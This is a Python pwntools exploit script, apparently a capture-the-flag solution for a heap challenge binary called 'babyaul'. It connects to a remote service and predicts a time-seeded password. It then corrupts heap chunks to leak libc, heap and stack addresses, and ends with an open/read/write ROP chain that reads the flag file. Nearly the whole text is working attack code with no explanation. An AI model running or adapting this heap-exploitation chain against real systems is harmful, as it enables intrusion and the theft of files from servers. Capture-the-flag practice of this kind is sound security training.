1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126
| from pwn import * from ctypes import *
io = remote('39.106.65.110', 14188) context.binary = './babyaul'
elf = ELF('./babyaul', checksec = False) libc = ELF('libc-2.31.so', checksec = False) dll = cdll.LoadLibrary('libc-2.31.so')
rc = lambda n : io.recv(n) ru = lambda x : io.recvuntil(x, drop = True) sd = lambda x : io.send(x) sla = lambda a, b : io.sendlineafter(a, b) ia = lambda : io.interactive() uu64 = lambda x : u64(x.ljust(8, '\x00')) libc_os = lambda x : libc_base + x heap_os = lambda x : heap_base + x libc_sym = lambda x : libc_os(libc.sym[x])
def cmd(x): sla('>', x)
def add(size, mode, content): cmd('add') sla('size?', str(size)) sla('mode?', str(mode)) sd(content)
def delete(idx): cmd('del') sla('index?', str(idx))
def show(idx): cmd('get') sla('index?\n', str(idx))
cmd('pass') dll.srand(dll.time(0)) ans = bytearray(dll.rand() % 43 + 48 for _ in range(4)) sla('pass:', str(ans))
add(0x500, 3, 'junk') add(0x500, 3, 'junk') add(0x500, 3, 'junk') pld = flat({ 0x98: 0xb91 + 2 * 0x110 }) add(0x500, 3, pld) delete(0) add(0x500, 3, 'a') show(0) libc_base = uu64(rc(6)) - (0x7f2c510a4b61 - 0x7f2c50eb8000) environ = libc_sym('environ')
delete(0) delete(2) add(0x500, 3, 'a' * 8) show(0) ru('a' * 8) heap_base = uu64(rc(6)) - (0x558eab44cc50 - 0x558eab441000)
add(0x500, 3, 'a' * 8) add(0x100, 2, 'a' * 8) add(0x100, 2, 'a' * 8) add(0x100, 2, 'a' * 8) add(0x100, 2, 'a' * 8) add(0x100, 2, 'a' * 8) add(0x4f0, 3, 'a' * 8) add(0x4f0, 3, 'a' * 8) add(0x4f0, 3, 'a' * 8) delete(9) pld = flat({ 0x4f0: 0xb90 + 2 * 0x110 }) add(0x4f8, 3, pld) delete(3) pld = flat({ 8: 0x501, 0x10: heap_os(0x557bbfbd9200 - 0x557bbfbcd000), 0x18: heap_os(0x557bbfbd9200 - 0x557bbfbcd000), 0x98: 0xb91 + 2 * 0x110, 0xa0: heap_os(0x557bbfbd9170 - 0x557bbfbcd000), 0xa8: heap_os(0x557bbfbd9170 - 0x557bbfbcd000) }) add(0x500, 3, pld) delete(10) delete(6) delete(5) add(0x500, 3, flat({0x470: environ - 0x10})) add(0x100, 2, 'a') add(0x100, 2, 'a' * 0x10) show(10) ru('a' * 0x10) ret_addr = uu64(rc(6)) - (0x7fff4817b6f8 - 0x7fff4817b308) delete(8) delete(7) add(0x500, 3, flat({0x180: ret_addr})) add(0x100, 2, 'flag\x00') flag_str_addr = heap_os(0x5578779648a0 - 0x557877958000) open_addr = libc_sym('open') read_addr = libc_sym('read') write_addr = libc_sym('write') pop_rdi = libc_os(0x0000000000023b72) pop_rsi = libc_os(0x000000000002604f) pop_rdx_r12 = libc_os(0x0000000000119241) rop_chain = flat([ pop_rdi, flag_str_addr, pop_rsi, 0, open_addr, pop_rdi, 3, pop_rsi, heap_base + 0x200, pop_rdx_r12, 0x30, 0, read_addr, pop_rdi, 1, write_addr ]) add(0x100, 1, rop_chain) ia()
|